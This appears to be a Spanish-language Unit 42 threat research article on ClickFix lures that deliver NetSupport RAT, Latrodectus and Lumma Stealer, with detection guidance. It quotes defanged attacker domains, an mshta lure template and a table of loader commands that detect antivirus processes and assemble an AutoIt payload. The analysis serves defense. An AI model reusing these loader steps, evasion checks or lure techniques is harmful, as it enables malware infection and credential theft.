[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.com/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/es-la/)  
Menu

* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)
* [Security Consulting](https://www.paloaltonetworks.com/unit42)
* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Spanish (LATAM)
* [English](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/)
* [Spanish (LATAM)](https://unit42.paloaltonetworks.com/es-la/preventing-clickfix-attack-vector/)
* [French](https://unit42.paloaltonetworks.com/fr/preventing-clickfix-attack-vector/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/preventing-clickfix-attack-vector/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/es-la/ "Threat Research")
* [Investigación de amenazas](https://unit42.paloaltonetworks.com/es-la/category/threat-research-es-la/ "Investigación de amenazas")
* [Malware](https://unit42.paloaltonetworks.com/es-la/category/threat-research-es-la/malware-es-la/ "Malware")  
  [Malware](https://unit42.paloaltonetworks.com/es-la/category/threat-research-es-la/malware-es-la/)

# Arregla el clic: Prevención del vector de ataque ClickFix

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 16 lectura mínima  
Related Products  
[Advanced DNS Security](https://unit42.paloaltonetworks.com/es-la/product-category/advanced-dns-security-es-la/ "Advanced DNS Security")[Advanced URL Filtering](https://unit42.paloaltonetworks.com/es-la/product-category/advanced-url-filtering-es-la/ "Advanced URL Filtering")[Advanced WildFire](https://unit42.paloaltonetworks.com/es-la/product-category/advanced-wildfire-es-la/ "Advanced WildFire")[Cloud-Delivered Security Services](https://unit42.paloaltonetworks.com/es-la/product-category/cloud-delivered-security-services-es-la/ "Cloud-Delivered Security Services")[Cortex](https://unit42.paloaltonetworks.com/es-la/product-category/cortex-es-la/ "Cortex")[Cortex XDR](https://unit42.paloaltonetworks.com/es-la/product-category/cortex-xdr-es-la/ "Cortex XDR")[Cortex XSIAM](https://unit42.paloaltonetworks.com/es-la/product-category/cortex-xsiam-es-la/ "Cortex XSIAM")[![Unit 42 Incident Response icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/05/unit42_RGB_logo_Icon_Color.png)Unit 42 Incident Response](https://unit42.paloaltonetworks.com/es-la/product-category/unit-42-incident-response-es-la/ "Unit 42 Incident Response")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  Por:
  
  * [Rem Dudas](https://unit42.paloaltonetworks.com/es-la/author/rem-dudas/)
  * [Noa Dekel](https://unit42.paloaltonetworks.com/es-la/author/noa-dekel/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  Publicado:10 de Julio de 2025

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  Categorías
  
  * [Investigación de amenazas](https://unit42.paloaltonetworks.com/es-la/category/threat-research-es-la/)
  * [Malware](https://unit42.paloaltonetworks.com/es-la/category/threat-research-es-la/malware-es-la/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  Etiquetas:
  
  * [AutoIT](https://unit42.paloaltonetworks.com/es-la/tag/autoit-es-la/)
  * [ClickFix](https://unit42.paloaltonetworks.com/es-la/tag/clickfix-es-la/)
  * [Lumma Stealer](https://unit42.paloaltonetworks.com/es-la/tag/lumma-stealer-es-la/)
  * [Malvertising](https://unit42.paloaltonetworks.com/es-la/tag/malvertising-es-la/)
  * [Remote Access Trojan](https://unit42.paloaltonetworks.com/es-la/tag/remote-access-trojan-es-la/)
  * [Social engineering](https://unit42.paloaltonetworks.com/es-la/tag/social-engineering-es-la/)
  * [Typosquatting](https://unit42.paloaltonetworks.com/es-la/tag/typosquatting-es-la/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/es-la/preventing-clickfix-attack-vector/?pdf=download&lg=es-la&_wpnonce=5f0cc26d8b "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/es-la/preventing-clickfix-attack-vector/?pdf=print&lg=es-la&_wpnonce=5f0cc26d8b "Click here to print")

Compartir![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=Arregla%20el%20clic:%20Prevención%20del%20vector%20de%20ataque%20ClickFix&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fes-la%2Fpreventing-clickfix-attack-vector%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fes-la%2Fpreventing-clickfix-attack-vector%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fes-la%2Fpreventing-clickfix-attack-vector%2F&title=Arregla%20el%20clic:%20Prevención%20del%20vector%20de%20ataque%20ClickFix "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fes-la%2Fpreventing-clickfix-attack-vector%2F&text=Arregla%20el%20clic:%20Prevención%20del%20vector%20de%20ataque%20ClickFix "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fes-la%2Fpreventing-clickfix-attack-vector%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=Arregla%20el%20clic:%20Prevención%20del%20vector%20de%20ataque%20ClickFix%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fes-la%2Fpreventing-clickfix-attack-vector%2F "Share in Mastodon")

## Resumen ejecutivo

En este artículo, compartimos consejos de caza y estrategias de mitigación para las campañas de ClickFix y ofrecemos una visión interna de algunas de las campañas de ClickFix más destacadas que hemos visto hasta ahora en 2025:

* Los atacantes que distribuyen el troyano de acceso remoto (RAT) NetSupport están intensificando sus actividades con un nuevo cargador
* Los atacantes que distribuyen el malware Latrodectus están atrayendo a las víctimas con una nueva campaña ClickFix
* Prolífica campaña de Lumma Stealer dirigida a varios sectores con nuevas técnicas

ClickFix es una técnica cada vez más popular que los actores de amenazas utilizan en señuelos de ingeniería social. Con esta técnica se engaña a las víctimas potenciales para que ejecuten comandos maliciosos, con la excusa de llevar a cabo "soluciones rápidas" para problemas informáticos comunes.

Estas campañas utilizan la reputación de productos y servicios legítimos para ocultar sus actividades de forma que resulte más difícil descubrirlas. Esto no implica que el autor del archivo ejecutable sea culpable o responsable del resultado causado por el malware.

Las campañas de ClickFix han repercutido en organizaciones de muy diversos sectores, entre ellos los siguientes:

* Tecnología avanzada
* Servicios financieros
* Manufactura
* Comercio mayorista y minorista
* Gobierno estatal y local
* Servicios profesionales y legales
* Servicios públicos y energía

Unit 42 ha ayudado recientemente en casi una docena de casos de respuesta a incidentes en los que un señuelo de ClickFix fue el vector de acceso inicial.

Un señuelo ClickFix eficaz podría permitir a los actores de amenazas llevar a cabo una toma de control completa de la organización objetivo. Estos señuelos pueden ser bastante sencillos de preparar para los actores de amenazas, dejando a las organizaciones susceptibles de recopilación de credenciales, robo de correo e incluso incidentes de ransomware.

Identificamos dos variantes de esta técnica:

* Ordenar a un objetivo que ejecute comandos maliciosos en la ventana Ejecutar mediante la tecla de Windows + R (Win+R)
* Ordenar a una víctima potencial que ejecute comandos maliciosos en una ventana de terminal mediante la tecla de Windows + X (Win+X).

Los clientes de Palo Alto Networks están mejor protegidos frente a las amenazas aquí descritas gracias a los siguientes productos y servicios:

* [WildFire avanzado](https://www.paloaltonetworks.com/network-security/advanced-wildfire)
* [URL Filtering avanzado](https://www.paloaltonetworks.com/network-security/advanced-url-filtering) y [Seguridad DNS avanzada](https://www.paloaltonetworks.com/network-security/advanced-dns-security)
* [Cortex XDR](https://docs-cortex.paloaltonetworks.com/p/XDR) y [XSIAM](https://docs-cortex.paloaltonetworks.com/p/XSIAM)

Si cree que puede haber resultado vulnerado o tiene un problema urgente, póngase en contacto con el [equipo de respuesta ante incidentes de Unit 42](https://start.paloaltonetworks.com/contact-unit42.html).

| **Temas relacionados con Unit 42** | [**Social Engineering**](https://unit42.paloaltonetworks.com/es-la/tag/social-engineering-es-la/), **[Malware](https://unit42.paloaltonetworks.com/es-la/category/threat-research-es-la/malware-es-la/)** ,[**Malvertising**](https://unit42.paloaltonetworks.com/es-la/tag/malvertising-es-la/) |
|------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|

## Disección de la técnica ClickFix

Antes de examinar la técnica ClickFix, debemos entender mejor qué es ClickFix y hasta qué punto se ha extendido en los últimos meses.

ClickFix es una técnica de ingeniería social relativamente nueva que los actores de amenazas utilizan cada vez más en las campañas de ataque. Con esta técnica se engaña a los usuarios objetivo para que apliquen "soluciones rápidas" a problemas informáticos comunes, como problemas de rendimiento, controladores que faltan o errores emergentes. En los últimos meses, muchos de los señuelos que utilizan la técnica ClickFix han sido falsas páginas de verificación en las que se pide a las víctimas que completen una acción antes de continuar supuestamente hacia el destino previsto por el usuario.

Los actores de amenazas suelen lanzar estos señuelos a través de:

* Sitios web legítimos pero comprometidos
* Publicidad malintencionada
* Tutoriales en YouTube
* Falsos foros de asistencia técnica

La técnica ClickFix se basa en [secuestro del portapapeles](https://www.malwarebytes.com/blog/news/2025/03/fake-captcha-websites-hijack-your-clipboard-to-install-information-stealers). Las páginas web que utilizan ClickFix inyectan scripts o comandos maliciosos en el portapapeles de la víctima potencial y proporcionan instrucciones para pegar y ejecutar el contenido malicioso. Como la técnica ClickFix pide a los usuarios que peguen el contenido, a veces se denomina "pastejacking".

Los atacantes utilizan la técnica ClickFix como vector de infección inicial y las cargas útiles que le siguen varían: algunos señuelos dejan caer infostealers, otros implementan RAT o desactivan herramientas de seguridad. Pero todos se basan en convencer a la víctima para que haga el trabajo del atacante por ellos: ejecutar el código manualmente.

Este método de entrega elude muchos controles estándar de detección y prevención. No hay ningún exploit, adjunto de phishing o enlace malicioso. En su lugar, las víctimas potenciales ejecutan ellas mismas el comando sin saberlo, a través de un shell de confianza del sistema.

Este método hace que las infecciones de ClickFix sean más difíciles de detectar que las descargas no autorizadas o los programas maliciosos tradicionales. Sin embargo, los investigadores aún pueden buscar artefactos para detectar estas infecciones.

### El auge de un fenómeno mundial

Hemos estado vigilando de cerca los señuelos de ClickFix en los últimos meses y hemos encontrado decenas de variantes que ofrecen varias familias de malware. En la Figura 1 se muestra la distribución de casos por semana.
![Gráfico de barras en el que se muestra el recuento de eventos por semana, desde la semana que comienza el 30 de diciembre de 2024 hasta el 12 de mayo de 2025. El recuento de eventos varía entre un mínimo de 1 y un máximo de 126. Se observan picos importantes en la semana que comienza el 27 de enero de 2025, con 121 eventos, y el 24 de marzo de 2025, con 126 eventos.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/09/chart-3.png) Figura 1. Casos semanales de infección desde principios de 2025.

Nuestros investigadores también observaron el impacto de ClickFix en una amplia variedad de sectores empresariales, como se muestra en la Figura 2.
![Gráfico de barras en el que se muestra el recuento de entidades por industria. Las industrias representadas de mayor a menor recuento son: Tecnología avanzada, servicios financieros, manufactura, comercio mayorista y minorista, administración estatal y local, servicios profesionales y jurídicos, servicios públicos y energía, farmacia y ciencias biológicas, hotelería, telecomunicaciones, atención de salud, gobierno federal y educación. Bloqueo del logotipo de Palo Alto Networks y Unit 42.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/09/word-image-156218-157571-2.png) Figura 2. Distribución de las industrias afectadas por los señuelos de ClickFix.

## Estudios de casos

Tres de las campañas más destacadas que hemos observado hasta ahora en 2025 muestran cómo los actores de amenazas han integrado ClickFix en el flujo de ataque de varias familias de malware.

### NetSupport RAT cambia su carga

Durante la búsqueda de actividades relacionadas con ClickFix, identificamos una campaña especialmente prolífica que estuvo activa en mayo de 2025. En esta campaña, los atacantes que utilizaban NetSupport RAT afectaron a varias industrias, entre ellas las siguientes:

* Atención de salud
* Servicios jurídicos
* Telecomunicaciones
* Venta minorista
* Minería

Esta campaña de ClickFix que distribuye NetSupport RAT aprovecha los dominios de distribución que se hacen pasar por servicios legítimos y populares:

* DocuSign: una plataforma digital para firmar, enviar y gestionar documentos electrónicamente.
* Okta: una plataforma que ayuda a las empresas a gestionar y proteger el acceso de los usuarios a aplicaciones y sistemas. Proporciona servicios de registro único (SSO), autenticación multifactor y gestión de identidades.

Los actores de amenazas con frecuencia abusan, se aprovechan o subvierten productos legítimos con fines maliciosos. Esto no implica que el producto legítimo sea defectuoso o malicioso.

En las Figuras 3 y 4 se muestran las páginas de destino falsas de DocuSign y Okta:

![Página de aterrizaje falsa para PandaDoc, en la que se habla de la alternativa de firma de documentos, se destaca la facilidad y la rentabilidad, con varios distintivos del sector y logotipos de marcas de confianza.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/09/word-image-159874-157571-3.png) Figura 3. Página de aterrizaje falsa para DocuSign en docusign.sa\[.\]com. ![Captura de pantalla de una página de verificación de seguridad falsa en la que aparece una casilla de verificación llamada "Verify you are human" (Verifique que es humano) con el logotipo de Cloudflare debajo. En el texto se explica que el sitio necesita revisar la seguridad de la conexión antes de continuar.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/09/word-image-162891-157571-4.png) Figura 4. Página de destino falsa para Okta en oktacheck.it\[.\]com. Sospechamos que esta campaña de ClickFix distribuye NetSupport RAT a través de la infraestructura de [ClearFake](https://reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/). Nuestra sospecha se basa en las similitudes entre el señuelo de ClickFix y la infraestructura de ClearFake. Ambos contienen los mismos comentarios en ruso y utilizan una funcionalidad idéntica de inyección en el portapapeles de JavaScript.

ClearFake es un marco JavaScript malicioso que se implementa en sitios web comprometidos como parte de campañas de descargas no solicitadas utilizadas por otras cepas de malware. En la Figura 5 se muestra a ClearFake inyectando un comando PowerShell codificado mediante la función JavaScript unsecuredCopyToClipboard. En la figura también aparecen comentarios en ruso dentro del código, lo que nos da pistas sobre los orígenes del desarrollador de ClearFake.
![Una captura de pantalla dividida en dos secciones en las que se muestran los pasos de verificación a la izquierda y el código informático a la derecha. A la izquierda, una interfaz naranja le indica al usuario que complete los pasos de verificación, como mantener pulsada la tecla de Windows y R, y verificar con Intro. Este es el primer paso. A la derecha, una interfaz de codificación con líneas de código en colores rojo y negro, notas en ruso, que indican modificaciones de un comando PowerShell. El segundo paso es el comando PowerShell ofuscado que se inyecta en el teclado del usuario.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/09/word-image-165593-157571-5.png) Figura 5. Página de destino e inyección de scripts en una página falsa de DocuSign.

En la ventana de verificación falsa se muestran instrucciones para abrir el cuadro de diálogo Ejecutar y, a continuación, pegar en él el contenido del portapapeles; la interfaz presenta estas instrucciones como una prueba para demostrar que el usuario es humano. La víctima puede no ser consciente del comando PowerShell malicioso que el sitio web inyecta posteriormente (como se ha mencionado anteriormente, este es un ejemplo de [pastejacking](https://github.com/dxa4481/Pastejacking)).

Una vez ejecutado, el comando descarga otro script PowerShell que descarga y ejecuta la siguiente fase del ataque. La cadena de infección se representa en la Figura 6.
![Diagrama de flujo en el que se ilustra un ciberataque en el que se utilizan mensajes falsos del sitio web de Okta, la ejecución de Cmd.exe y PowerShell para descargar y ejecutar software malicioso, incluida la RAT NetSupport y varios archivos ejecutables, lo que conduce a la inyección y extracción de datos.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/Es-LA_NetSupportRAT-Infection-Chain-676x440.png) Figura 6. La cadena de infección de NetSupport RAT.

La siguiente etapa está dentro de un archivo ZIP, que incluye todas las dependencias legítimas necesarias para ejecutar jp2launcher.exe. Este archivo es un componente legítimo de Java Runtime Environment (JRE) utilizado para lanzar aplicaciones Java, como se muestra en la Figura 7.
![Captura de pantalla de una computadora en la que se muestra una lista de archivos relacionados principalmente con componentes y aplicaciones de Microsoft Windows. En cada entrada de archivo se muestra el nombre del archivo, la fecha de modificación, el tipo y el tamaño. Tres filas se resaltan en un recuadro rojo.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/09/word-image-172658-157571-7.png) Figura 7. Contenido del archivo ZIP descargado por cmd.exe.

En primer lugar, cmd.exe descarga el archivo ZIP, extrae su contenido y lo guarda en el directorio %APPDATA%/Local/Temp/ directory. A continuación, cmd.exe ejecuta jp2launcher.exe, que carga un cargador malicioso llamado msvcp140.dll. El [Apéndice](#post-157571-_zctlzocvrsya) de este artículo proporciona un análisis técnico completo del nuevo cargador NetSupport RAT basado en DLL.

Por último, la DLL descarga y ejecuta un archivo ZIP que contiene NetSupport RAT (client32.exe) y los archivos asociados. NetSupport RAT es un software legítimo, pero las copias desactualizadas o robadas suelen utilizarse indebidamente por [diferentes actores de amenazas](https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html), normalmente configuradas como RAT para la infiltración e infección de endpoints.

### Latrodectus lanza nuevos señuelos ClickFix

Durante marzo-abril de 2025, observamos un aumento del tráfico hacia dominios controlados por Latrodectus. También observamos un cambio en la estrategia de infección, ya que los atacantes que distribuían Latrodectus empezaron a utilizar la técnica ClickFix en sus vectores de acceso iniciales.

Esta cadena de ataques Latrodectus comienza cuando una persona visita un sitio web legítimo, pero comprometido. A continuación, la infraestructura ClearFake redirige al usuario del sitio a una página de verificación falsa. En esta página se presenta un mensaje que indica al usuario que ejecute un comando a través del cuadro de diálogo Ejecutar, mientras que el backend JavaScript malicioso inyecta un comando PowerShell en el portapapeles del endpoint.

En la Figura 8 se muestra el señuelo y la cadena de redireccionamiento posterior desde el sitio comprometido.
![Captura de pantalla de una computadora en la que se muestra una página de verificación captcha que indica al usuario que complete los pasos mediante atajos de teclado. En la pantalla también se muestran herramientas de desarrollo web abiertas en el navegador con varios nombres de script visibles.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/09/word-image-175418-157571-8.png) Figura 8. Señuelo Latrodectus ClickFix.

Cuando las víctimas pegan y ejecutan el comando inyectado, no ven el comando en sí. Lo que sí ven es el comentario final al final del script (Cloud Identificator: 2031), que parece parte de un proceso de autenticación normal. Sin embargo, al ejecutarse, el script utiliza curl.exe para descargar un archivo JavaScript de un servidor de mando y control (C2). A continuación, ejecuta el archivo mediante Cscript, como se muestra en la Figura 9.
![Fragmento de código con resaltado de sintaxis en modo oscuro, con algunas redacciones por privacidad.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/09/word-image-180086-157571-9.png) Figura 9. Un comando malicioso inyectado desde un señuelo ClickFix en el portapapeles del objetivo.

Desde su aparición a mediados de 2024, los atacantes suelen distribuir Latrodectus a través de una cadena que incluye un archivo JavaScript malicioso que descarga un archivo Microsoft Software Installer (MSI) que deja caer Latrodectus. En este caso, el archivo JavaScript ejecutado (la.txt) recupera un archivo MSI de un servidor remoto y lo ejecuta con msiexec.exe.

A diferencia de campañas anteriores, en las que el descargador JavaScript solía estar saturado y ofuscado con comentarios sin sentido, esta variante emplea grandes variables JSON basura que tienen nombres aparentemente legítimos, como var\_Apple\_Palantir38 y func\_Slack\_encryption84. En la Figura 10 se muestra una comparación de las técnicas de ofuscación utilizadas en campañas anteriores y recientes de Latrodectus.
![Dos imágenes paralelas en las que se muestran scripts de codificación: la de la izquierda representa un fragmento de código con variables y funciones, mientras que la de la derecha incluye un bloque de código con un bucle y sentencias condicionales.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/09/word-image-182702-157571-10.png) Figura 10. Comparación entre técnicas de ofuscación recientes (izquierda) y antiguas (derecha) utilizadas en los cuentagotas Latrodectus.

La carga útil MSI deposita varios archivos en el disco de la víctima. Estos incluyen [Latrodectus](https://www.virustotal.com/gui/file/aef5c150cfe8154ed290b293e30d552cfb9b40b3552369345c7c2f135b63aac4/relations), que se deja caer como un archivo DLL malicioso (libcef.dll), y un binario legítimo que carga la DLL. Esto se demuestra en la Figura 11.
![Diagrama de la cadena de infección de Latrodectus, que comienza con un sitio web legítimo comprometido y se mueve a través de la táctica ClickFix, lo que lleva a la descarga y ejecución de un archivo EXE y un código shell malicioso.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/Es-LA_Latrodectus-Infection-Chain-748x440.png) Figura 11. La cadena de infección de Latrodectus.

Cuando el archivo legítimo carga lateralmente la DLL maliciosa para Latrodectus, inyecta shellcode en sí mismo.

En una [entrada de Timely Threat Intelligence](https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-05-16-IOCs-on-recent-ClickFix-activity.txt)de mayo de 2025, analizamos una campaña Latrodectus parecida, en la que Lumma Stealer era la carga útil final de la cadena de ataque completa.

### Campaña de typosquatting de Lumma Stealer

Mientras que los atacantes que distribuyen Lumma Stealer comenzaron a utilizar la técnica de infección ClickFix [a finales de 2024](https://www.esentire.com/security-advisories/lumma-stealer-clickfix-distribution)hemos visto un aumento en los intentos de infección ClickFix para Lumma Stealer tan recientemente como abril de 2025. En campañas recientes, los atacantes que distribuyen Lumma Stealer han afectado a una amplia gama de sectores, entre ellos los siguientes:

* Automotriz
* Energía
* TI
* Software

En nuestra investigación de una de estas campañas de ClickFix, descubrimos que a los objetivos se les pide que copien un comando MSHTA único con la siguiente estructura: mshta xxxx\[.\]co/xxxxxx =+\\xxx.

Los atacantes dan a cada objetivo una cadena identificadora específica, que pueden utilizar para recibir la carga útil una vez. Sin embargo, los URI que nuestros investigadores comprobaron ya no entregaban las cargas útiles después de la infección.

Al ejecutar el script ClickFix, el script redirige al espectador a una versión [typosquatted](https://unit42.paloaltonetworks.com/cybersquatting/) de los dominios IP Logger iplogger\[.\]org e iplogger\[.\]com. IP Logger es un servicio de acortamiento de URL y seguimiento de IP que crea enlaces para registrar información sobre los usuarios, como la siguiente:

* Direcciones IP
* Geolocalización
* Detalles del dispositivo
* Comportamiento de navegación

El dominio typosquatted controlado por los atacantes es iplogger\[.\]co, y la página de este dominio está camuflada como un servicio conocido y legítimo.

En todos los casos de la campaña, observamos que el comando MSHTA descargaba un script PowerShell codificado, que iniciaba una infección Lumma Stealer. En la Figura 12 se muestra toda la cadena de infección.
![Infección Lumma Stealer que describe el proceso de un ataque de malware en el que intervienen entidades como ClickFix, Encoded PowerShell, Lumma Stealer, y diversas funciones como contactar con el servidor de Mando y control (C2), crear ejecutables y detectar productos de seguridad. En el gráfico se muestran las conexiones y acciones como la caída de recursos y los comandos de ejecución a lo largo del ciclo de vida del ataque.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/Es-LA_LummaStealer-Diagram-658x440.png) Figura 12. La cadena de infección Lumma Stealer.

Cada enlace controlado por el atacante aloja un comando PowerShell fuertemente ofuscado y codificado en Base64 que, en última instancia, conduce a la caída y ejecución de un stager malicioso de Lumma Stealer llamado PartyContinued.exe. Este ejecutable se aloja en: hxxps\[:\]//pub-\<dynamically generated number string\>.r2\[.\]dev y se nombra para que parezca una URL de desarrollador legítima.

Cuando se inicia PartyContinued.exe, se configura un nuevo método de carga de Lumma que utiliza un lenguaje de scripting llamado [AutoIt](https://www.autoitscript.com/wiki/AutoIt_and_Malware). Esta versión de Lumma Stealer es parecida a las anteriores, pero incluye un nuevo archivo CAB (Microsoft cabinet archive) llamado Boat.pst. Este archivo CAB se incluye dentro de PartyContinued.exe y contiene el resto del contenido que se utiliza para crear un motor de scripts AutoIt3 y un script AutoIt que ejecuta para Lumma Stealer.

En la Tabla 1 se resumen los comandos que ejecuta el cargador y su finalidad:

|-----------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------|
| **Comando**                                                                                                                                               | **Descripción**                                                                                                                                                   | **Propósito**                                                                  |
| lista de tareas | findstr /I "opssvc wrsa"                                                                                                               | Realiza una búsqueda insensible a mayúsculas y minúsculas de opssvc o wrsa en el nombre de un proceso en ejecución.                                               | Detección de software de seguridad para endpoints                              |
| lista de tareas | findstr "bdservicehost SophosHealth AvastUI AVGUI nsWscSvc ekrn"                                                                       | Busca varias cadenas en los procesos en ejecución.                                                                                                                | Detección de software de seguridad para endpoints                              |
| cmd /c md 386354                                                                                                                                          | Crea un directorio para guardar el malware en el disco.                                                                                                           | Fijar la ubicación para la extracción de la carga útil                         |
| extrac32 /Y /E Boat.pst                                                                                                                                   | Extrae los archivos del archivo.cab llamado Boat.pst, sobrescribiendo los archivos existentes (/Y) y extrayendo todos los archivos (/E).                          | Extracción de la carga útil                                                    |
| set /p ="MZ" \> 386354\\Slovenia\[.\]com \<nul                                                                                                            | Crea un archivo llamado Slovenia\[.\]com en el directorio 386354 que contiene dos bytes para los caracteres MZ.                                                   | Construir el ejecutor AutoIt3                                                  |
| findstr /V "Tr" Bell \>\> 386354\\Slovenia\[.\]com                                                                                                        | Agrega todas las líneas del archivo extraído llamado Bell que no contengan la cadena Tr (distingue mayúsculas de minúsculas) al archivo Slovenia\[.\]com.         | Construir el ejecutor AutoIt3                                                  |
| cmd /c copy /b 386354\\Slovenia\[.\]com + Costura + Monetario + Cubierto + Salud + Pérdida + Intel + Escape + Tramadol + Aparato 386354\\Slovenia\[.\]com | Agrega otros archivos extraídos para terminar de crear un archivo binario con copy /b. El resultado es una copia de AutoIt3.exe, cuyo nombre es Slovenia\[.\]com. | Construir el ejecutor AutoIt3                                                  |
| cmd /c copy /b ..\\Presently.pst + ..\\Instantly.pst + ..\\Roy.pst + ..\\Tolerance.pst + ..\\Mailto.pst + ..\\Marco.pst + ..\\Mint.pst G                  | Crea un binario llamado G que Slovenia\[.\]com ejecutará como un script compilado de AutoIt v3 (.a3x).                                                            | Construir la carga útil del Lumma Stealer (ejecución binaria como archivo .a3x |
| iniciar Eslovenia\[.\]com G                                                                                                                               | Comando para que el ejecutor AutoIt3 ejecute el binario para Lumma Stealer como un archivo .a3x.                                                                  | Cargar/ejecutar Lumma Stealer                                                  |
| elección /d y /t 5                                                                                                                                        | Comando para seleccionar sí (y) para la opción por defecto (/d) para comandos en el archivo .bat después de esperar 5 segundos (/t 5).                            | Permite que Lumma Stealer se ejecute sin interacción del usuario               |

*Tabla 1. Comandos ejecutados por el cargador para Lumma Stealer.*

Como se muestra en la tabla, Slovenia\[.\]com es una copia del motor de scripts AutoIt3.exe que ejecuta un binario que se ejecuta como un script AutoIt (.a3x) llamado G, que es responsable de las siguientes etapas del ataque. Esta versión de Latrodectus recolecta información sensible, como contraseñas de navegadores basados en Chromium, e intenta filtrarlas a un servidor C2 en sumeriavgv\[.\]digital.

## A la caza de infecciones ClickFix

Los ataques ClickFix suelen dejar rastros fácilmente detectables, sobre todo cuando las personas que ven estos señuelos no están familiarizadas con la apertura de interfaces administrativas, por lo que es más probable que peguen una cadena de comandos maliciosa en una ventana Ejecutar.

### Revisión de artefactos RunMRU

Windows mantiene una clave de registro que almacena los comandos ejecutados más recientemente desde la ventana Ejecutar (Win + R), llamada RunMRU:

HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU

Esta clave del registro guarda todos los comandos que se ejecutan desde la ventana Ejecutar, lo que permite a los analistas analizar estas entradas en busca de indicios de uso sospechoso.

Algunos indicadores clave de contenidos RunMRU sospechosos podrían ser los siguientes:

* Contenido ofuscado
* Palabras clave relacionadas con la descarga y ejecución de cargas útiles procedentes de dominios desconocidos o sospechosos
* Palabras clave que indican llamadas a interfaces administrativas

Estas entradas sugieren que alguien podría haber activado manualmente dichos comandos, lo que concuerda con el flujo de infección de ClickFix.

### Detección de Win + X ClickFix

Algunos atacantes pretenden evitar exponer su actividad en la clave de registro RunMRU. En su lugar, presentan instrucciones para iniciar un terminal para PowerShell (Windows 11) o Símbolo del sistema (Windows 10) mediante Win+X para el menú de acceso rápido. Según un [informe de marzo de 2025](https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2), los atacantes que distribuían Havoc utilizaban esta variante Win+X de ClickFix.

Los cazadores de amenazas pueden buscar indicios de esta técnica Win+X ClickFix con la telemetría EDR o los registros de eventos de Windows, concretamente:

* **Evento de seguridad ID 4688 (creación de proceso):** Busque powershell.exe generado por explorer.exe, en correlación con Event ID 4663 (Object Access) de archivos bajo la carpeta %LocalAppData%\\Microsoft\\Windows\\WinX\\.
